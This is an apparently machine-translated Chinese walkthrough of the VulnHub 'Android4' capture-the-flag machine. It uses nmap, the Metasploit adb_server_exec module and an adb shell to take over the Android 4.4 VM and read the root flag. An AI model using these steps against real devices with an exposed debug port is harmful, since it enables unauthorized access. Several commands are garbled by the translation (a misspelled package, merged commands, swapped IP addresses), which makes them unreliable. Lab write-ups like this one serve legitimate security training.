对vulnhub中Android4靶机渗透测试全过程!

      最后更新:2020-04-15 10:50:20 手机定位技术交流文章

      安卓4目标简介

      名称:安卓4

      操作系统:安卓4.4

      标志:/data/root/(在此目录中)

      年级:初学者。

      下载链接:安卓4:https://download.vulnhub.com/android 4/安卓4.ova

      构建成功的安卓平台

      知识点

      >。端口扫描和IP发现>使用adb服务器执行攻击端口8080代理>使用ADB连接到设备。>。使用metasploit。>。权限升级和解决方案渗透过程

      1:获取IP地址

      使用命令:ARP-扫描-l

      由此我们可以看到无人机的IP地址:192.168.232.146

      2:扫描打开的端口

      在这次扫描中,我们将使用最流行的工具nmap进行全端部首扫描。

      使用命令:nmap -p- -A 192.168.232.146

      由此,我确定有某种与端口8080相关的网页。

      我毫不迟疑地打开了网页,但什么也没找到。

      大多数人会认为使用POST会涉及某种语言篡改。我也试过了,但没有发现有用的东西。

      在尝试了其他方法(PHP命令行界面和dropboard RCE)后,我找到了一个更好的方法。

      PHP命令行界面上的漏洞扫描:搜索脚本(关于如何使用搜索脚本:记住在实战目标机器中使用搜索脚本的摘要)

      我尝试了PHP命令行界面和Dropbear RCE,发现dropboard扫描会产生有用的信息。

      安卓调试桥(adb)是一个多功能命令行工具,允许你与你的设备进行通信(关于如何使用adb: adb用法-详细教程(棒极了的adb))

      Adb命令可以方便各种设备操作,例如安装和调试应用程序,并且可以访问Unix外壳,该外壳可用于在设备上运行各种命令。

      这是一个客户端-服务器程序,包括三个组件

      1:发送命令的客户端。客户端在您的开发计算机上运行。您可以通过发出adb命令从命令行终端调用客户端。2:在设备上运行命令的守护进程(adbd)。守护进程作为后台进程在每个设备上运行。3:服务器用于管理客户端和守护进程之间的通信。服务器作为开发计算机上的后台进程运行。如果您没有安装adb,您可以通过sudo apt-get安装adb安装它。

      sudo apt-get install abd

      为了启动亚行服务器,我们使用了metasploit:

      首先:开始元搜索

      msfconsole

      地面端口很可能不接受连接。在本例中,我们将默认端口从4444更改为3333

      使用漏洞/Android/ADB/ADB _ server _ exec set RHOST 192 . 168 . 232 . 145设置LHOST 192 . 168 . 232 . 146设置LPORT漏洞

      下一步是利用亚行

      只要上述状态显示“正在连接到设备”,就在新的终端窗口上键入命令:

      adb连接192 . 168 . 232 . 146:5555 ADB shell

      让我们看看密码:

      找不到有用的内容。

      到defaullt目录:

      suidls

      在/data目录中,我们找到了一个名为“root”的文件夹

      cd /datals

      最后一步是成功获得答案:

      cd /rootlscat flag.txt

      参考:

      从先知社区开始:https://xz.aliyun.com/t/2859

      打破机器人4:练习(CTF挑战):黑客articles.in/hack-the-android 演练-CTF-挑战/

      亚行用途-真棒亚行:https://blog.csdn.net/u010610691/article/details/77663770

      在实战目标飞机中使用搜索技术综述:https://xz.aliyun.com/t/2857

      本文由 在线网速测试 整理编辑,转载请注明出处,原文链接:https://www.wangsu123.cn/news/4417.html

          热门文章

          文章分类